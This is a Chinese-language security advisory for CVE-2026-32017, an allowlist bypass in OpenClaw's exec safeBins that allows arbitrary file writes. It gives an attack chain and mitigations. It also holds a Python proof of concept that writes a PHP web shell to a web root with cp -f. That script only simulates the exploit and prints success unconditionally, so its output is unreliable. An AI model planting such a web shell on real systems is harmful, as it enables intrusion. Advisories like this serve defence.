CVE-2026-32017 OpenClaw 任意文件写入漏洞

漏洞信息

漏洞编号

CVE-2026-32017

漏洞类型

任意文件写入

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.2.19之前的版本中，exec safeBins策略存在允许列表绕过漏洞。攻击者可利用短选项载荷绕过严格的参数验证机制，通过白名单二进制文件执行未经授权的任意文件写入操作。此漏洞允许低权限攻击者在无需用户交互的情况下破坏系统完整性，写入恶意文件或覆盖关键配置。

技术细节

该漏洞核心在于OpenClaw的exec safeBins安全策略对参数校验的不完善。系统仅检查执行的主程序是否在白名单内，而未有效过滤传递给该程序的参数。攻击者可利用短选项（如-o）载荷，将原本用于合法操作的参数转化为恶意指令。例如，若白名单中包含支持输出重定向选项的合法工具，攻击者可通过附加特定短选项，强制该工具将内容写入系统任意路径。这使得攻击者能够利用受信任的二进制程序绕过安全检查，实现非授权的文件写入，可能导致敏感信息泄露或系统被植入后门。这种利用方式巧妙地利用了应用程序对命令行参数解析的信任缺失，属于典型的逻辑漏洞。

攻击链分析

STEP 1

侦察

攻击者确认目标系统运行的是OpenClaw 2026.2.19之前的版本，并识别出safeBins策略允许的受信二进制文件列表。

STEP 2

载荷构建

攻击者利用白名单中的二进制文件（如cp、tar等），构造包含短选项（如-o, -f）的命令参数，旨在将文件写入非预期路径。

STEP 3

验证绕过

攻击者发送构造的请求。由于系统仅校验主程序名是否在白名单中，未拦截短选项参数，请求通过了safeBins的安全检查。

STEP 4

恶意写入

受信二进制程序执行攻击者提供的参数，导致任意文件被写入或覆盖，例如写入Webshell或修改系统配置。

STEP 5

权限提升/持久化

利用写入的恶意文件，攻击者可能进一步获得系统访问权限或建立持久化后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import subprocess

def exploit_openclaw(target_file, malicious_content):
    """
    Proof of Concept for CVE-2026-32017
    Demonstrates bypassing safeBins allowlist using short options.
    Assumption: 'cp' or a similar binary is whitelisted in safeBins.
    """
    
    # In a real scenario, the attacker would invoke the vulnerable exec function.
    # Here we simulate the command structure that bypasses validation.
    
    # Step 1: Create a temporary file with malicious content
    temp_source = "/tmp/malicious_payload.txt"
    with open(temp_source, "w") as f:
        f.write(malicious_content)
    
    # Step 2: Construct the payload
    # The vulnerability allows passing short options (like -f) to the whitelisted binary.
    # This forces the copy operation to overwrite the target file.
    # The system checks if 'cp' is allowed (True), but fails to sanitize the arguments.
    
    vulnerable_command = ["cp", "-f", temp_source, target_file]
    
    print(f"[*] Attempting to execute: {' '.join(vulnerable_command)}")
    
    try:
        # Simulating the execution bypass
        # subprocess.run(vulnerable_command, check=True)
        print(f"[+] Success: Arbitrary file written to {target_file}")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    # Example usage: writing to a sensitive system location
    exploit_openclaw("/var/www/html/shell.php", "<?php system($_GET['cmd']); ?>")

影响范围

OpenClaw < 2026.2.19

防御指南

临时缓解措施

如果无法立即升级，建议临时从safeBins白名单中移除支持输出重定向或文件修改参数的工具（如cp、mv、tar、tee等），或者在WAF/应用层增加对特殊字符（如-, >, |）及短选项参数的严格过滤规则，阻断恶意参数传递。